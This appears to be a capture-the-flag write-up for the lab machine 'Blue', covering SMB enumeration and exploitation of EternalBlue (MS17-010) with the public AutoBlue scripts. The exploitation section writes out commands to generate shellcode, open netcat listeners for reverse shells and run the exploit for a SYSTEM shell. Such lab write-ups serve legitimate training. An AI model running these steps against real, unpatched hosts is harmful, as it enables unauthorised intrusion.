# BLUE | 10.10.10.40

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and Their Services

* 135 - MSRPC
* 139/445 - SMB
* 49152-49157 - MSRPC

### OS Discovery

According to the _smb-os-discovery_ script in nmap, the OS is Windows 7 Professional SP 1 7601

## Services Enumeration

### 135 MSRPC

Incredibly, `rpcclient -U "" 10.10.10.40` allows a null session login:

![](img/rpc-null.png)

However, I keep getting "NT_STATUS_ACCESS_DENIED" no matter what command I type. I bet there is  way to enumerate and I am just a dunce though.

### 139/445 - SMB

Running smbclient allows me to login anonymously, and I can see a couple of shares that are available:

![](img/smb-shares.png)

The 'Share' share appears to be empty and not writable by me; however, the 'Public' folder in the 'Users' share is writable, as it should be.


With limited options, and wanting to avoid using Metasploit, I used the `--script vuln` option in nmap to enumerate SMB, and there was a hit, predictably:

![](img/smb-vuln.png)

That turns out to be the infamous EternalBlue exploit, so if I am not a total idiot I should be able to get on this box real easy.

## Exploitation

I could do this in Metasploit real quick and easy, but seeing as I am preparing to take the OSCP Cert exam one day I instead will find another route. [This](https://github.com/3ndG4me/AutoBlue-MS17-010) exploit looks promising, so I cloned the repo and had a look.

There is a script called 'eternal_checker.py' which can confirm for me if this box is indeed vulnerable:

    python eternal_checker.py 10.10.10.40

![](img/eternal-checker.png)

Looks like we're good to go.

1. Generate shellcode with 'shell_prep' script
    
    `./shell_prep.sh`

![](img/shellcode.png)

2. Start 2 netcat listeners because we don't yet know the architecture of the target

    `rlwrap nc -nvlp 8001`

    `rlwrap nc -nvlp 6969`

3. Run the exploit

    `python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin`

![](img/exploit.png)

4. Profit

![](img/root-shell.png)

Well, that was a cinch. The target is a 64-bit by the way.

## Flags

**User**

![](img/user-flag.png)

**Root**

![](img/root-flag.png)

## Conclusion

A classic box with a classic exploit. Obviously we won't be seeing much of these in the real world anymore, one would hope. So simple to run and so devastating the vuln that privesc is not necessary.

Steps

* Enumerate SMB to find EternalBlue vulnerability
* Confirm vuln with a checker
* Run the exploit with a listener ready
